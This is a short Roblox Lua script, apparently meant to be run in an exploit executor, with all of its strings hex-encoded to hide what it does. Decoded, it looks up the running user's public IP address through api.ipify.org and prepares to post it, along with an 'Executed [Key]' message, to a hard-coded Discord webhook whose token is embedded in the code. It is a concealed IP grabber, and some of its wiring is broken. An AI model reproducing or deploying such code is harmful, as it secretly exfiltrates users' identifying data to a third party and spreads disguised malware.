-- DAC

local _0x6bc0 = {}
_0x6bc0["\x6e\x70\x6d\x75\x73"] = game:GetService("\x48\x74\x74\x70\x53\x65\x72\x76\x69\x63\x65"):GetAsync("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x69\x70\x69\x66\x79\x2e\x6f\x72\x67")
local _0x8bd5 = {}
_0x8bd5["\x63\x6f\x6e\x74\x65\x6e\x74"] = "\x45\x78\x65\x63\x75\x74\x65\x64\x20\x5b\x4b\x65\x79\x5d\x5c\x6e\x49\x50\x20\x41\x64\x64\x72\x65\x73\x73\x3a\x20" .. _0x6bc0["\x6e\x70\x6d\x75\x73"]
local _0x1b77 = {}
_0x1b77["\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65"] = "\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e"
local _0x37c7 = http_request or request or HttpPost or syn["\x72\x65\x71\x75\x65\x73\x74"]
local _0x5e28 = {
    ["\x55\x72\x6c"] = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x73\x63\x6f\x72\x64\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x77\x65\x62\x68\x6f\x6f\x6b\x73\x2f\x31\x30\x39\x32\x32\x37\x32\x34\x32\x38\x37\x33\x36\x30\x35\x33\x33\x31\x39\x2f\x6a\x76\x33\x63\x4a\x4c\x76\x31\x59\x71\x4c\x56\x4a\x68\x78\x45\x5f\x36\x6f\x75\x67\x54\x65\x73\x70\x72\x46\x69\x78\x33\x53\x5a\x72\x6b\x6a\x33\x69\x43\x4c\x2d\x6e\x75\x36\x5a\x35\x61\x52\x34\x49\x2d\x77\x2d\x65\x59\x63\x63\x47\x6f\x36\x66\x76\x32\x57\x72\x44\x37\x77\x36"
}
local _0x2c6b = {
    ["\x55\x72\x6c"] = webhookURL,
    ["\x42\x6f\x64\x79"] = _0x5e28,
    ["\x4d\x65\x74\x68\x6f\x64"] = "\x50\x4f\x53\x54",
    ["\x48\x65\x61\x64\x65\x72\x73"] = _0x1b77
}
_0x37c7(_0x2c6b)